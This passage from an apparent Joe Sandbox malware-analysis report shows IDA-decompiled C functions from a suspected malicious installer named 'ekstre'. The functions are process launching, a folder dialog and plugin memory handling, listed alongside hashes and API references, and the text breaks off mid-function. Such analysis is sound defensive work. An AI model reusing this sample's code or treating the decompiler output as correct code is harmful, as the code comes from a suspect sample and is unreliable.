Associated: 00000000.00000002.1223458765.0000000000661000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223910796.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 5a5c4a952826dcbd4dad185aa274d322bf5ed66f67c501ed72866704e0dbe47d
Instruction ID: 5a30394b93e65fd8a17989e6605914f9aef953664f6616273aff2242651056bf
Opcode Fuzzy Hash: 5a5c4a952826dcbd4dad185aa274d322bf5ed66f67c501ed72866704e0dbe47d
Instruction Fuzzy Hash: E5B01236186A00FBDE914B00DE0DF457E62F764701F008178F345240F0CEB204E4DB08

Uniqueness

Uniqueness Score: -1.00%

Function 00405C8E Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405C8E(struct _SHELLEXECUTEINFOW* _a4) {
				struct _SHELLEXECUTEINFOW* _t4;
				int _t5;

				_t4 = _a4;
				_t4->lpIDList = _t4->lpIDList & 0x00000000;
				_t4->cbSize = 0x3c; // executed
				_t5 = ShellExecuteExW(_t4); // executed
				return _t5;
			}

0x00405c8e
0x00405c93
0x00405c97
0x00405c9d
0x00405ca3

APIs

ShellExecuteExW.SHELL32(?), ref: 00405C9D

Memory Dump Source

Source File: 00000000.00000002.1223360699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1223332334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223422559.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000481000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.00000000004C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.00000000004C9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000661000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223910796.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre.jbxd

Similarity

API ID: ExecuteShell
String ID:
API String ID: 587946157-0
Opcode ID: 34af207f7f04f37b2a6a243a8c8041682423b78b35e6f682d2e1a111f695392f
Instruction ID: 155326c85e208380d9db810c36285a9e1b4200be200639c8195ffcf147e959ee
Opcode Fuzzy Hash: 34af207f7f04f37b2a6a243a8c8041682423b78b35e6f682d2e1a111f695392f
Instruction Fuzzy Hash: BEC092B2000200EFE301CF80CB09F067BE8AF54306F028068E185DA060C7788840CB29

Uniqueness

Uniqueness Score: -1.00%

Function 004045E6 Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004045E6(int _a4) {
				int _t2;

				_t2 = EnableWindow( *0x446744, _a4); // executed
				return _t2;
			}

0x004045f0
0x004045f6

APIs

KiUserCallbackDispatcher.NTDLL(?,004043BD), ref: 004045F0

Memory Dump Source

Source File: 00000000.00000002.1223360699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1223332334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223422559.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000481000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.00000000004C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.00000000004C9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000661000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223910796.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: ae290c5a3a9bb10011a3cf71756f5d6e7621248849e07898e686139ae3f7abb2
Instruction ID: b8cbf5b22e962298bdca335de0b5dd231d91e1f395c54b46411239c3469517a1
Opcode Fuzzy Hash: ae290c5a3a9bb10011a3cf71756f5d6e7621248849e07898e686139ae3f7abb2
Instruction Fuzzy Hash: 1CA002754445009BDE015B51DF0DD057B71E7557057014579A54550034C6314460FB1D

Uniqueness

Uniqueness Score: -1.00%

Function 00401FA4 Relevance: 1.3, APIs: 1, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E00401FA4(void* __ecx) {
				void* _t9;
				intOrPtr _t13;
				void* _t15;
				void* _t17;
				void* _t20;
				void* _t22;

				_t17 = __ecx;
				_t19 = E00402DA6(_t15);
				E004056CA(0xffffffeb, _t7); // executed
				_t9 = E00405C4B(_t19); // executed
				_t20 = _t9;
				if(_t20 == _t15) {
					 *((intOrPtr*)(_t22 - 4)) = 1;
				} else {
					if( *((intOrPtr*)(_t22 - 0x28)) != _t15) {
						_t13 = E00406AE0(_t17, _t20);
						if( *((intOrPtr*)(_t22 - 0x2c)) < _t15) {
							if(_t13 != _t15) {
								 *((intOrPtr*)(_t22 - 4)) = 1;
							}
						} else {
							E004065AF( *((intOrPtr*)(_t22 - 0xc)), _t13);
						}
					}
					_push(_t20);
					CloseHandle();
				}
				 *0x4702e8 =  *0x4702e8 +  *((intOrPtr*)(_t22 - 4));
				return 0;
			}

0x00401fa4
0x00401faa
0x00401faf
0x00401fb5
0x00401fba
0x00401fbe
0x0040292e
0x00401fc4
0x00401fc7
0x00401fca
0x00401fd2
0x00401fe1
0x00401fe3
0x00401fe3
0x00401fd4
0x00401fd8
0x00401fd8
0x00401fd2
0x00401fea
0x00401feb
0x00401feb
0x00402c2d
0x00402c39

APIs

Part of subcall function 004056CA: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsc76F4.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
Part of subcall function 004056CA: lstrlenW.KERNEL32(004030A8,Skipped: C:\Users\user\AppData\Local\Temp\nsc76F4.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
Part of subcall function 004056CA: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsc76F4.tmp\System.dll,004030A8), ref: 00405725
Part of subcall function 004056CA: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsc76F4.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsc76F4.tmp\System.dll), ref: 00405737
Part of subcall function 004056CA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
Part of subcall function 004056CA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
Part of subcall function 004056CA: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785

Part of subcall function 00405C4B: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0045E750,00000000,00000000), ref: 00405C74
Part of subcall function 00405C4B: CloseHandle.KERNEL32(?), ref: 00405C81

CloseHandle.KERNEL32(?,?,?,?,?,?,?), ref: 00401FEB

Part of subcall function 00406AE0: WaitForSingleObject.KERNEL32(?,00000064,00000000,00000000,?,?,00401F9F,?,?,?,?,?,?), ref: 00406AF1
Part of subcall function 00406AE0: GetExitCodeProcess.KERNEL32(?,?), ref: 00406B13

Part of subcall function 004065AF: wsprintfW.USER32 ref: 004065BC

Memory Dump Source

Source File: 00000000.00000002.1223360699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1223332334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223422559.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000481000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.00000000004C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.00000000004C9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000661000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223910796.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre.jbxd

Similarity

API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
String ID:
API String ID: 2972824698-0
Opcode ID: e911b038a3bdaf1142bdd9c90d72b5248e765dee47743448e588bd37853eeb3f
Instruction ID: c4f57583bcc0ac0362ce7bf03689a7cc6a9ffb684fd717776286c5df0fdbd7b6
Opcode Fuzzy Hash: e911b038a3bdaf1142bdd9c90d72b5248e765dee47743448e588bd37853eeb3f
Instruction Fuzzy Hash: C1F09072905112EBDF11BBA599C8DAE76A4DF01318B25453BE102B21E1D77C4E428A5E

Uniqueness

Uniqueness Score: -1.00%

Function 6DDD12F8 Relevance: 1.3, APIs: 1, Instructions: 6
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6DDD12F8() {
				void* _t3;

				_t3 = GlobalAlloc(0x40,  *0x6ddd5040 +  *0x6ddd5040); // executed
				return _t3;
			}

0x6ddd1302
0x6ddd1308

APIs

GlobalAlloc.KERNELBASE(00000040,?,6DDD11C4,-000000A0), ref: 6DDD1302

Memory Dump Source

Source File: 00000000.00000002.1347263504.000000006DDD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 6DDD0000, based on PE: true

Associated: 00000000.00000002.1347232243.000000006DDD0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.1347305831.000000006DDD4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.1347348567.000000006DDD6000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ddd0000_ekstre.jbxd

Similarity

API ID: AllocGlobal
String ID:
API String ID: 3761449716-0
Opcode ID: 3ebee7af5205b6062a71b5fd9dc2bfbab4c970c7ff7c9bc5172084c61310af6b
Instruction ID: 623b1f903386c3b69886afaba3069e7349a7ba816431780c8eee9353cb440435
Opcode Fuzzy Hash: 3ebee7af5205b6062a71b5fd9dc2bfbab4c970c7ff7c9bc5172084c61310af6b
Instruction Fuzzy Hash: BEB001B16C0100AFFE40AB68ED5AF3536B8FB4670AF548050FA05EA185D76898108B69

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00404AB5 Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 275
stringCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E00404AB5(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				long _v16;
				long _v20;
				long _v24;
				char _v28;
				intOrPtr _v32;
				long _v36;
				char _v40;
				unsigned int _v44;
				signed int _v48;
				WCHAR* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				WCHAR* _v72;
				void _v76;
				struct HWND__* _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t82;
				long _t87;
				short* _t89;
				void* _t95;
				signed int _t96;
				int _t109;
				signed short _t114;
				signed int _t118;
				struct HWND__** _t122;
				intOrPtr* _t138;
				WCHAR* _t146;
				unsigned int _t150;
				signed int _t152;
				unsigned int _t156;
				signed int _t158;
				signed int* _t159;
				signed int* _t160;
				struct HWND__* _t166;
				struct HWND__* _t167;
				int _t169;
				unsigned int _t197;

				_t156 = __edx;
				_t82 =  *0x43e720; // 0x71d69c
				_v32 = _t82;
				_t146 = ( *(_t82 + 0x3c) << 0xe) + 0x471000;
				_v12 =  *((intOrPtr*)(_t82 + 0x38));
				if(_a8 == 0x40b) {
					E00405CAC(0x3fb, _t146);
					E004068EF(_t146);
				}
				_t167 = _a4;
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E00405CAC(0x3fb, _t146);
							if(E0040603F(_t186, _t146) == 0) {
								_v8 = 1;
							}
							E00406668(0x436718, _t146);
							_t87 = E00406A35("true");
							_v16 = _t87;
							if(_t87 == 0) {
								L30:
								E00406668(0x436718, _t146);
								_t89 = E00405FE2(0x436718);
								_t158 = 0;
								if(_t89 != 0) {
									 *_t89 = 0;
								}
								if(GetDiskFreeSpaceW(0x436718,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
									goto L35;
								} else {
									_t169 = 0x400;
									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
									asm("cdq");
									_v48 = _t109;
									_v44 = _t156;
									_v12 = 1;
									goto L36;
								}
							} else {
								_t159 = 0;
								if(0 == 0x436718) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t114 = _v16(0x436718,  &_v48,  &_v28,  &_v40);
									if(_t114 != 0) {
										break;
									}
									if(_t159 != 0) {
										 *_t159 =  *_t159 & _t114;
									}
									_t160 = E00405F83(0x436718);
									 *_t160 =  *_t160 & 0x00000000;
									_t159 = _t160;
									 *_t159 = 0x5c;
									if(_t159 != 0x436718) {
										continue;
									} else {
										goto L30;
									}
								}
								_t150 = _v44;
								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
								_v44 = _t150 >> 0xa;
								_v12 = 1;
								_t158 = 0;
								__eflags = 0;
								L35:
								_t169 = 0x400;
								L36:
								_t95 = E00404F52(5);
								if(_v12 != _t158) {
									_t197 = _v44;
									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
										_v8 = 2;
									}
								}
								if( *((intOrPtr*)( *0x46823c + 0x10)) != _t158) {
									E00404F3A(0x3ff, 0xfffffffb, _t95);
									if(_v12 == _t158) {
										SetDlgItemTextW(_a4, _t169, 0x436708);
									} else {
										E00404E71(_t169, 0xfffffffc, _v48, _v44);
									}
								}
								_t96 = _v8;
								 *0x470304 = _t96;
								if(_t96 == _t158) {
									_v8 = E0040140B(7);
								}
								if(( *(_v32 + 0x14) & _t169) != 0) {
									_v8 = _t158;
								}
								E004045E6(0 | _v8 == _t158);
								if(_v8 == _t158 &&  *0x446738 == _t158) {
									E00404A0E();
								}
								 *0x446738 = _t158;
								goto L53;
							}
						}
						_t186 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t118 = _a12 & 0x0000ffff;
					if(_t118 != 0x3fb) {
						L12:
						if(_t118 == 0x3e9) {
							_t152 = 7;
							memset( &_v76, 0, _t152 << 2);
							_v80 = _t167;
							_v72 = 0x446748;
							_v60 = E00404E0B;
							_v56 = _t146;
							_v68 = E004066A5(_t146, 0x446748, _t167, 0x43a720, _v12);
							_t122 =  &_v80;
							_v64 = 0x41;
							__imp__SHBrowseForFolderW(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E00405F37(_t146);
								_t125 =  *((intOrPtr*)( *0x470270 + 0x11c));
								if( *((intOrPtr*)( *0x470270 + 0x11c)) != 0 && _t146 == L"C:\\Users\\Arthur\\AppData\\Local\\Microsoft\\Windows\\INetCache\\Primnesses\\Sofabordets\\Adreamed") {
									E004066A5(_t146, 0x446748, _t167, 0, _t125);
									if(lstrcmpiW(0x460200, 0x446748) != 0) {
										lstrcatW(_t146, 0x460200);
									}
								}
								 *0x446738 =  *0x446738 + 1;
								SetDlgItemTextW(_t167, 0x3fb, _t146);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t166 = GetDlgItem(_t167, 0x3fb);
					if(E00405FAE(_t146) != 0 && E00405FE2(_t146) == 0) {
						E00405F37(_t146);
					}
					 *0x468238 = _t167;
					SetWindowTextW(_t166, _t146);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push("true");
					E004045C4(_t167);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E004045C4(_t167);
					E004045F9(_t166);
					_t138 = E00406A35(8);
					if(_t138 == 0) {
						L53:
						return E0040462B(_a8, _a12, _a16);
					} else {
						 *_t138(_t166, "true");
						goto L8;
					}
				}
			}

0x00404ab5
0x00404abb
0x00404ac1
0x00404ace
0x00404adc
0x00404adf
0x00404ae7
0x00404aed
0x00404aed
0x00404af9
0x00404afc
0x00404b6a
0x00404b71
0x00404c48
0x00404c4f
0x00404c5e
0x00404c5e
0x00404c62
0x00404c6c
0x00404c79
0x00404c7b
0x00404c7b
0x00404c89
0x00404c90
0x00404c97
0x00404c9a
0x00404cd6
0x00404cd8
0x00404cde
0x00404ce3
0x00404ce7
0x00404ce9
0x00404ce9
0x00404d05
0x00000000
0x00404d07
0x00404d0a
0x00404d18
0x00404d1e
0x00404d1f
0x00404d22
0x00404d25
0x00000000
0x00404d25
0x00404c9c
0x00404c9e
0x00404ca2
0x00000000
0x00000000
0x00000000
0x00000000
0x00404ca4
0x00404ca4
0x00404cb1
0x00404cb6
0x00000000
0x00000000
0x00404cba
0x00404cbc
0x00404cbc
0x00404cc5
0x00404cc7
0x00404ccc
0x00404ccf
0x00404cd4
0x00000000
0x00000000
0x00000000
0x00000000
0x00404cd4
0x00404d31
0x00404d3b
0x00404d3e
0x00404d41
0x00404d48
0x00404d48
0x00404d4a
0x00404d4a
0x00404d4f
0x00404d51
0x00404d59
0x00404d60
0x00404d62
0x00404d6d
0x00404d6d
0x00404d62
0x00404d7d
0x00404d87
0x00404d8f
0x00404daa
0x00404d91
0x00404d9a
0x00404d9a
0x00404d8f
0x00404daf
0x00404db4
0x00404db9
0x00404dc2
0x00404dc2
0x00404dcb
0x00404dcd
0x00404dcd
0x00404dd9
0x00404de1
0x00404deb
0x00404deb
0x00404df0
0x00000000
0x00404df0
0x00404c9a
0x00404c51
0x00404c58
0x00000000
0x00000000
0x00000000
0x00404c58
0x00404b77
0x00404b80
0x00404b9a
0x00404b9f
0x00404ba9
0x00404bb0
0x00404bbc
0x00404bbf
0x00404bc2
0x00404bc9
0x00404bd1
0x00404bd4
0x00404bd8
0x00404bdf
0x00404be7
0x00404c41
0x00404be9
0x00404bea
0x00404bf1
0x00404bfb
0x00404c03
0x00404c10
0x00404c24
0x00404c28
0x00404c28
0x00404c24
0x00404c2d
0x00404c3a
0x00404c3a
0x00404be7
0x00000000
0x00404b9f
0x00404b8d
0x00000000
0x00000000
0x00404b93
0x00000000
0x00404afe
0x00404b0b
0x00404b14
0x00404b21
0x00404b21
0x00404b28
0x00404b2e
0x00404b37
0x00404b3a
0x00404b3d
0x00404b45
0x00404b48
0x00404b4b
0x00404b51
0x00404b58
0x00404b5f
0x00404df6
0x00404e08
0x00404b65
0x00404b68
0x00000000
0x00404b68
0x00404b5f

APIs

GetDlgItem.USER32(?,000003FB), ref: 00404B04
SetWindowTextW.USER32(00000000,?), ref: 00404B2E
SHBrowseForFolderW.SHELL32(?), ref: 00404BDF
CoTaskMemFree.OLE32(00000000), ref: 00404BEA
lstrcmpiW.KERNEL32(Call,00446748,00000000,?,?), ref: 00404C1C
lstrcatW.KERNEL32(?,Call), ref: 00404C28
SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404C3A

Part of subcall function 00405CAC: GetDlgItemTextW.USER32(?,?,00002000,00404C71), ref: 00405CBF

Part of subcall function 004068EF: CharNextW.USER32(?,*?|<>/":,00000000,00000000,75D53420,004D5000,?,0040361B,004D5000,004D5000,00403923), ref: 00406952
Part of subcall function 004068EF: CharNextW.USER32(?,?,?,00000000,?,0040361B,004D5000,004D5000,00403923), ref: 00406961
Part of subcall function 004068EF: CharNextW.USER32(?,00000000,75D53420,004D5000,?,0040361B,004D5000,004D5000,00403923), ref: 00406966
Part of subcall function 004068EF: CharPrevW.USER32(?,?,75D53420,004D5000,?,0040361B,004D5000,004D5000,00403923), ref: 00406979

GetDiskFreeSpaceW.KERNEL32(00436718,?,?,0000040F,?,00436718,00436718,?,?,00436718,?,?,000003FB,?), ref: 00404CFD
MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404D18

Part of subcall function 00404E71: lstrlenW.KERNEL32(00446748,00446748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F12
Part of subcall function 00404E71: wsprintfW.USER32 ref: 00404F1B
Part of subcall function 00404E71: SetDlgItemTextW.USER32(?,00446748), ref: 00404F2E

Strings

Call, xrefs: 00404C16, 00404C1B, 00404C26
A, xrefs: 00404BD8
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Primnesses\Sofabordets\Adreamed, xrefs: 00404C05
HgD, xrefs: 00404BB2

Memory Dump Source

Source File: 00000000.00000002.1223360699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1223332334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223422559.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000481000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.00000000004C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.00000000004C9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000661000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223910796.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: A$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Primnesses\Sofabordets\Adreamed$Call$HgD
API String ID: 2624150263-1172139540
Opcode ID: 57e42c488c30fac2921128dcf62f9e8b05ba6fcefb72b84f5d43e0b192a985f6
Instruction ID: c51e7580995e792457c126f6717c920f984a5adb5ab4ba9b793ec1e64c8e9cb2
Opcode Fuzzy Hash: 57e42c488c30fac2921128dcf62f9e8b05ba6fcefb72b84f5d43e0b192a985f6
Instruction Fuzzy Hash: 3FA172B1901209ABDB11EFA5CD45EAF77B8EF84318F11843BF601B62D1DB7C89418B69

Uniqueness

Uniqueness Score: -1.00%

Function 6DDD2351 Relevance: 18.7, APIs: 12, Instructions: 705
stringlibrarymemoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 83%

			E6DDD2351() {
				void _v4;
				void* _v8;
				signed short _v12;
				signed int _v16;
				WCHAR* _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				void* _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				void* _v60;
				short* _t243;
				signed short* _t245;
				signed int _t246;
				signed int _t250;
				void* _t256;
				struct HINSTANCE__* _t257;
				signed int _t258;
				signed int _t260;
				void* _t261;
				signed short _t263;
				signed int _t267;
				void* _t268;
				signed int* _t269;
				void* _t280;
				signed int _t281;
				signed int _t282;
				signed int _t284;
				signed int _t287;
				signed int _t290;
				void* _t294;
				signed int _t295;
				signed short* _t296;
				void* _t299;
				signed int _t306;
				signed int _t307;
				signed int _t311;
				signed int _t313;
				signed int _t314;
				signed int _t315;
				short* _t320;
				signed int _t321;
				signed short* _t325;
				signed int _t327;
				WCHAR* _t328;
				signed short* _t329;
				signed int _t341;
				void* _t343;
				signed int _t344;
				signed int _t345;
				signed int _t346;
				void* _t349;
				signed int _t350;
				signed int _t352;
				signed int _t354;
				signed int _t355;
				void* _t356;
				void* _t357;
				void* _t358;
				void* _t359;
				signed int _t365;
				signed int _t370;
				void* _t371;
				signed int _t378;
				signed int _t379;
				signed int _t380;
				void* _t381;
				signed short* _t383;
				void* _t384;
				void* _t386;
				signed short* _t387;
				short* _t388;
				WCHAR* _t389;
				WCHAR* _t390;
				struct HINSTANCE__* _t391;
				signed int _t393;
				signed int _t394;
				signed short _t395;
				void _t396;
				void* _t398;
				void* _t403;
				signed int _t405;
				signed int _t407;
				signed int _t409;

				_t394 = 0;
				_v32 = 0;
				_v52 = 0;
				_t386 = 0;
				_v28 = 0;
				_v56 = 0;
				_v24 = 0;
				_v16 = 0;
				_v36 = 0;
				_t243 = E6DDD12F8();
				_v40 = _t243;
				_t320 = _t243;
				_v20 = E6DDD12F8();
				_t245 = E6DDD1593();
				_t325 = _t245;
				_v8 = _t245;
				_v60 = _t325;
				_t387 = _t245;
				_v44 = _t325;
				_v4 = 2;
				while(1) {
					_t378 = _t394;
					if(_t394 != 0 && _t386 == 0) {
						break;
					}
					_t395 =  *_t325 & 0x0000ffff;
					_t246 = _t395 & 0x0000ffff;
					_v12 = _t395;
					_t327 = _t246;
					if(_t327 == 0) {
						_t175 =  &_v52;
						 *_t175 = _v52 | 0xffffffff;
						__eflags =  *_t175;
						L132:
						_t396 = _v32;
						L133:
						_t379 = _t378;
						if(_t379 == 0) {
							 *_t320 = 0;
							__eflags = _t386;
							if(_t386 != 0) {
								_t380 = 0;
								__eflags = 0;
							} else {
								_t386 = GlobalAlloc(0x40, 0x1ca4);
								_t380 = 0;
								 *(_t386 + 0x1010) = 0;
								 *((intOrPtr*)(_t386 + 0x1014)) = 0;
							}
							 *(_t386 + 0x1008) = _t380;
							_t184 = _t386 + 8; // 0x8
							_t328 = _t184;
							 *(_t386 + 0x100c) = _t380;
							_t186 = _t386 + 0x808; // 0x808
							_t388 = _t186;
							 *_t328 = 0;
							 *_t388 = 0;
							 *_t386 = _t396;
							 *(_t386 + 4) = _t380;
							_t250 = _t396 - _t380;
							__eflags = _t250;
							if(_t250 == 0) {
								__eflags = _t320 - _v40;
								if(_t320 == _v40) {
									goto L157;
								}
								_t393 = _t380;
								GlobalFree(_t386);
								_push(_v40);
								_t386 = E6DDD135A();
								__eflags = _t386;
								if(_t386 == 0) {
									goto L157;
								} else {
									goto L150;
								}
								while(1) {
									L150:
									_t280 =  *(_t386 + 0x1ca0);
									__eflags = _t280;
									if(_t280 == 0) {
										break;
									}
									_t393 = _t386;
									_t386 = _t280;
								}
								__eflags = _t393;
								if(_t393 != 0) {
									_t193 = _t393 + 0x1ca0;
									 *_t193 =  *(_t393 + 0x1ca0) & 0x00000000;
									__eflags =  *_t193;
								}
								_t281 =  *(_t386 + 0x1010);
								__eflags = _t281 & 0x00000008;
								if((_t281 & 0x00000008) == 0) {
									_t341 = 2;
									_t282 = _t281 | _t341;
									__eflags = _t282;
									 *(_t386 + 0x1010) = _t282;
								} else {
									_t386 = E6DDD1309(_t386);
									 *(_t386 + 0x1010) =  *(_t386 + 0x1010) & 0xfffffff5;
								}
								goto L157;
							} else {
								_t284 = _t250 - 1;
								__eflags = _t284;
								if(_t284 == 0) {
									L145:
									lstrcpyW(_t328, _v20);
									L146:
